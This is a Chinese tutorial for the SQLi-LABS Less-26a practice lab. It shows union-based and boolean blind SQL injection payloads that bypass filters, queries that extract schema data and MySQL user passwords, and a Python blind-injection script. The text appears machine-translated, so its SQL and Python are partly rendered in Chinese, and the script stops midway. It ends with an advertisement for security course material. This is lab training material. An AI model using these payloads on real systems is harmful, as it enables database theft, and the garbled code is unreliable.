SQLi LABS Less 26a 联合注入+布尔盲注_sql靶场第26a?sqlmap布尔盲注

SQLi LABS Less 26a 联合注入+布尔盲注_sql靶场第26a联合注入使用详解,原理步骤实战教程
第一步、判断注入点
地址栏输入:?id1’)anandd(1,页面正常显示
地址

关节注射使用详细说明,原理+流程+实用教程

第一步、判断注入点

如果我在地址栏中输入“?id=1\’)anandd(\’1”,页面将正确显示。

如果在地址栏输入“?id=1\’)anandd(\’0”,页面异常(空)。

由此我们可以看出,注入点是单引号+括号字符注入。

第二步、判断显示位

在地址栏中输入:id=0\’)union%a0select%a01,2,3%a0anandd(\’1

第三步、脱库

以您当前的数据库为例,在地址栏中键入以下内容:

?id=0\’)union%a0select%a01,

(数据库())

,3%a0andd(\’

对于其他数据库删除操作,只需将下面圆圈中的部分替换为您的SQL语句即可。

常用的退市声明包括:

# 获取所有数据库

选择group_concat(模式名称)

来自information_schema.schemata

# 获取安全库中的所有表

选择group_concat(表名)

来自information_schema.tables

其中表模式=\’安全\’

# 获取users表的所有字段

选择group_concat(列名)

来自information_schema.columns

其中table_schema=\’安全\’ 和table_name=\’用户\’

# 获取数据库管理员用户密码

选择a0group_concat(用户,密码)

来自%a0mysql.user%a0where%a0user=\’Mitsuan\’

方式二:布尔盲注

第一步、判断注入点

如果我在地址栏中输入“?id=1\’)anandd(\’1”,页面会正常显示。

如果在地址栏输入“?id=1\’)anandd(\’0”,则页面异常(空)。

第二步、判断长度

以您当前的数据库为例,假设数据库名称长度大于1,则在地址栏中输入以下内容:

?id=1\’)%a0anandd%a0

长度(

(数据库())

)1

%a0anandd(\’1

库名称必须大于1,以确保页面正确显示并且负载可用。

将测试长度从1 增加到稍后使用脚本测试。

第三步、枚举字符

截取库名的第一个字符,将其转换为ASCLL代码,并判断其是否大于1。在地址栏中输入:

?id=1\’)%a0anandd%a0

ASCII (

子字符串(

(数据库())

,1,1)

)1

%a0anandd(\’1

字符的ASCLL 代码必须大于1,以确保页面显示正确且负载可用。

接下来判断字符的ASCLL码是否等于(32~126)。

枚举完第一个字符后,按照此方法枚举其他字符,稍后使用脚本枚举。

脱库

Python自动推理脚本如下,可以根据需要进行修改。

导入请求

# 将URL 替换为您的射击场级别URL

# 更改两个对应的payload

# 目标URL(无参数)

网址=\’http://2caf52448445428bb6107f7e6c0b67f4.app.mituan.zone/Less-26a/\’

# 用于推断长度的有效负载

Payload_len=\’\’\’?id=1\’)%a0anandd%a0

长度(

(数据库())

)={n}

%a0anandd(\’1\’\’\’

# 用于枚举字符的有效负载

Payload_str=\’\’?id=1\’)%a0anandd%a0

ASCII (

子字符串(

(数据库())

,{l},1)

)={n}

%a0anandd(\’1\’\’\’

# 获取长度

def getLength(url, 有效负载):

length=1 # 初始测试长度为1

而True:

Response=request.get(url=url+payload_len.format(n=长度))

# 如果页面上存在该内容则表示成功。

如果响应中包含“您的登录名”。文本:

print(\’长度测试完成。长度为:\’, length,)

返回长度;

: 其他

print(\’测试长度:\’,length)

哪个兄弟不知道你可以提前回答网络安全面试问题?我们整理了160多道网络安全面试题(金9银10),帮助你在网络安全面试包中脱颖而出。一周去做这件事。

王兰一工程师面试题及答案,暂时只能对兄弟们有帮助了!如果你能正确回答70%的问题,找到一份稳定的工作应该不是什么大问题。

对于有1-3年工作经验后想换工作的朋友来说,这也是一个很好的资源!

【如何获取完整版在文末! ]

***93 网络安全面试问题***

![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)

![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)

![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)

我就不一一截图了,因为内容太多了。

### 推荐的黑客学习资源

最后给大家分享一套完整的网络安全学习资料,对所有想学习网络安全的人都有用。

对于刚接触网络安全的学生,我们创建了详细的学习和成长路线图。这可以说是最科学、最系统的学习路线。每个人都可以遵循这个大方向。

朋友们,如果您需要的话,请联系我们获取~

#### 1从基础零开始

##### 学习路线

对于从未接触过网络安全的同学,我们准备了详细的**学习与成长路线图**。这可以说是最科学、最系统的学习路线。大家按照这个大方向走是没有问题的。

![图片](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)

##### 路线兼容学习视频

同时,还根据成长路线提供了每个部分的支持视频。

![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

#### 2视频支持工具国内外网络安全书籍资料

##### 工具

![](https://img-blog.csdnimg.cn/img_convert/d3f08d9a26927e48b1332a38401b3369.png#pic_center)

##### 视频

![图片1](https://img-blog.csdnimg.cn/img_convert/f18acc028dc224b7ace77f2e260ba222.png#pic_center)

##### 书籍

![图片2](https://img-blog.csdnimg.cn/img_convert/769b7e13b39771b3a6e4397753dab12e.png#pic_center)

由于资源比较敏感,所以需要的资源并没有完全显示在底部。

![在此插入图片描述](https://img-blog.csdnimg.cn/e4f9ac066e8c485f8407a99619f9c5b5.png#pic_center)![在此插入图片描述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc243 0bb9ad 39.png#pic_center )

##### 简历模板

![在此插入图片描述](https://img-blog.csdnimg.cn/504b8be96bfa4dfb8befc2af49aabfa2.png#pic_center)

**由于篇幅有限且该信息较为敏感,仅展示部分信息。 **

以上#SQLi LABS Less 26a Joint Injection + Boolean Blind Injection_sql Range 26a相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92143.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月25日 上午3:08
下一篇 2024年6月25日 上午3:08

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注